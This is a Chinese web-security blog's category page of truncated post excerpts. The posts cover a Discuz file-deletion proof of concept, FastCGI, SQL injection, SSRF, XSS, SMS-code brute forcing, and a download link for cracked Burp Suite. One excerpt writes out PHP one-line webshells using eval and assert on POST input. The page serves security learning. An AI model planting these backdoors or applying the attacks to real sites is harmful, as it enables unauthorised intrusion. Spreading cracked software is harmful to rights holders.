分类 web安全 下的文章

Discuz_<3.4_birthprovince_前台任意文件删除Affected VersionDiscuz < 3.4 版本需要会员身份登陆站点。PoC测试:为了不破坏原有程序,在根目录下新建 1.txt 作为演示。登陆前台,访问 http://localhost/Discuz/Discuz_X3.2_TC_BIG5/home.php?mod=spacecp&ac=pro.......

官方更新公告官方更新公告此版本包含各种错误修复和对新的实验性浏览器驱动的扫描功能的性能增强。破解包及下载来源来自52破解感谢scz。经过铁幕小编测试 不支持win8 win10可正常使用上周五另有不相识的朋友在微信公众号后台提供了一个下载点:(需翻墙)https://mega.nz/#!vepwiAjC!khcN9 ... Jk1YXEfMDNxQupR5thc burp 2.1.6.......

漏洞原理FastcgiFastcgi是一个通信协议,和HTTP协议一样,都是进行数据交换的一个通道。HTTP协议是浏览器和服务器中间件进行数据交换的协议,浏览器将HTTP头和HTTP体用某个规则组装成数据包,以TCP的方式发送到服务器中间件,服务器中间件按照规则将数据包解码,并按要求拿到用户需要的数据,再以HTTP协议的规则打包返回给服务器。类比HTTP协议来说,fastcgi协议则.......

0x00 安装准备phpstudy https://www.xp.cn/phpstorm xdebug https://xdebug.org/0x01 配置过程1、安装好phpstudy后需要打印phpinfo()内容并且将phpinfo()的html源码放在,https://xdebug.org/wizard 这个地址里面的表单里。点击 Analyse my phpinfo().......

分类1.常见的sql注入按照参数类型可分为两种:数字型和字符型。当发生注入点的参数为整数时,比如 ID,num,page等,这种形式的就属于数字型注入漏洞。同样,当注入点是字符串时,则称为字符型注入,字符型注入需要引号来闭合。2.也可以根据数据库返回的结果,分为回显注入、报错注入、盲注。 回显注入:可以直接在存在注入点的当前页面中获取返回结果。报错注入:程序将数据库的返回错误信息直.......

PHP一句话后门一、常用执行代码函数1、eval():<?php @eval($_POST['hacker']); ?> eval函数将接受的字符串当做代码执行2、 assert():用法和 eval()一样<?php @assert($_POST['hacker']); ?> 3、preg_replace():<?php @preg_replace(&.......

1,短信验证码可爆破视频案例中输入手机号码、图片验证码就可以获取短信验证码,并且新密码也是在一个页面中,但是输入短信验证码之后,后端有个请求会判断短信验证码是否正确,错误的话页面会有提醒。攻击者可以用这个请求来爆破验证码,获取到正确的短信验证码之后就可以重置任意用户密码了。缺陷主要是两个方面,第一,未对短信验证码的失效时间进行限制;第二,功能设计存在缺陷,如果设计成整个功能只用最后一.......

字符串连接函数concat(str1,str2) //将字符串首尾相连 将多个字符串连接成一个字符串。 concat_ws(separator,str1,str2) //将字符串用指定连接符连接 例如 213|213 group_concat()// 字段拼接 例如 admin,Gordon,Hack,Pablo,Bob 字符串截取left(str,index) //从左边第.......

SSRF(Server-Side Request Forgery, 服务端请求伪造),攻击者伪造服务端发起的请求并执行,从而获得一些数据或进行攻击危害1.对内网的端口和服务进行扫描,对主机本地的一些敏感信息获取2.利用一些应用漏洞和一些协议进行攻击常见容易造成漏洞的php函数以及利用1.file_get_contents() 2.fsockopen() 3.curl_exec() 逐.......

今天看到一个XSS漏洞,插入点在一个有hidden 属性的input 标签,大致情况如下:<input type="hidden" name="returnurl" value="[USER INJECT]" /> 正常情况下的XSS应当是:http://victim/?value=” onclick=”aler.......